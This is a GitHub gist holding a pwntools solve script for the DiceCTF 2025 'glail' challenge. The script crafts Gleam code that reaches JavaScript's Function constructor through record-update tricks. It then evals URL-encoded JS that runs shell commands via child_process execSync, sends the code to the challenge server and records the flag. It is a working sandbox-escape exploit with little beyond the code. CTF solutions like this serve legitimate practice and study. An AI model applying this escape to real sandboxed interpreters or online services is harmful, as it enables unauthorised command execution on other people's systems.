Created
March 29, 2025 08:22
-
-
Save lebr0nli/eb96bcfa579a4e1c2d90fed9192a8618 to your computer and use it in GitHub Desktop.
DiceCTF 2025 Quals - glail (misc)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| JS = """ | |
| import('child_process').then(r=>console.log(r.execSync('cat flag.txt')+'')) | |
| """ | |
| JS = "eval(decodeURIComponent('%s'))" % "".join(f"%{ord(c):02x}" for c in JS) | |
| CODE = ( | |
| """ | |
| type Win = fn() -> Nil | |
| pub type Dummy { | |
| Dummy(constructor: fn(String) -> Win, d: fn() -> Dummy) | |
| } | |
| pub type Hax { | |
| Hax(constructor: fn() -> Dummy, d: Dummy) | |
| } | |
| pub fn win() -> Nil {} | |
| pub fn function_prototype(code: String) -> Win { | |
| win | |
| } | |
| pub fn hax() -> Dummy { | |
| Dummy(function_prototype, hax) | |
| } | |
| pub fn main() { | |
| let dummy = Dummy(function_prototype, hax) | |
| let x = Hax(hax, dummy) | |
| let y = Hax(..x) | |
| y.d.constructor("%s")() | |
| } | |
| """.strip() | |
| % JS | |
| ) | |
| # print(CODE) | |
| with remote("dicec.tf", 31333) as io: | |
| for c in CODE.split("\n"): | |
| if not c: | |
| continue | |
| io.sendlineafter(b">>> ", c.encode()) | |
| io.sendlineafter(b">>> ", b"\n") | |
| io.interactive() | |
| # dice{5f45c2d75de6c5ee} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment